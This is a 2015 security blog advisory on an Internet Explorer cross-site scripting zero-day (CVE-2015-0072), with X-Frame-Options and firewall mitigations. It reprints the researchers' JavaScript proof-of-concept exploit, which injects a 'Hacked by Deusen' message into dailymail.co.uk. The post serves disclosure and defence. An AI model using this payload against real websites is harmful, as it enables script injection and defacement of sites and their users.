Pages

Friday, February 6, 2015

How to Protect Yourself From an IE Zero-day Vulnerability That is Threatening Your Website

A new, previously unknown cross-site scripting vulnerability in Microsoft Internet Explorer, which lets remote users bypass the same-origin policy and inject arbitrary JavaScript into HTML pages, was revealed yesterday by deusen.co.uk.

Researchers from deusen.co.uk published sample exploit code to demonstrate how to hack dailymail.co.uk — Great Britain’s  leading online daily newspaper.  A specially formed link takes users to dailymail.co.uk, followed by the message “Hacked by Deusen”.


Message on dailymail.co.uk website


The sample exploit code looks like this:

 function go()
 {
  w=window.frames[0];
  w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);
 }
 setTimeout("go()",1000);

Both Internet Explorer 10.x and 11.x contain this flaw and are therefore exposed to this attack. You may find its detailed description at http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0072.

The experts at Positive Technologies point out that there are several similar exploit examples on the Web that demonstrate the threats this  new vulnerability poses to many sites, including those used for critical resources.

For example, check out this   simulated attack video, posted on PHDays website.


How to Stop this Threat

You must prohibit third party IFrames using the X-Frame-Options header sent by a web server.

The Apache setting in .htaccess looks like this:

Header always append X-Frame-Options SAMEORIGIN

For nginx:

add_header X-Frame-Options SAMEORIGIN;

For IIS:


If the X-Frame-Options  setting is not possible in your environment, you would need to increase the security level of your web application firewall.


PT Application Firewall Security Settings

It is worth mentioning that as of late  zero-day vulnerabilities within infrastructure components, like Shellshock and GHOST, have become more frequently publicized. Google has  also added fuel to the fire with its recent disclosure regarding Windows security flaws, despite Microsoft’s requests to become more flexible on the matter. It seems like the mainstream approach “discover – help to fix – publish details” is not in play any more.

7 comments:

  1. This comment has been removed by a blog administrator.

    ReplyDelete
  2. This comment has been removed by a blog administrator.

    ReplyDelete
  3. This comment has been removed by a blog administrator.

    ReplyDelete
  4. This comment has been removed by a blog administrator.

    ReplyDelete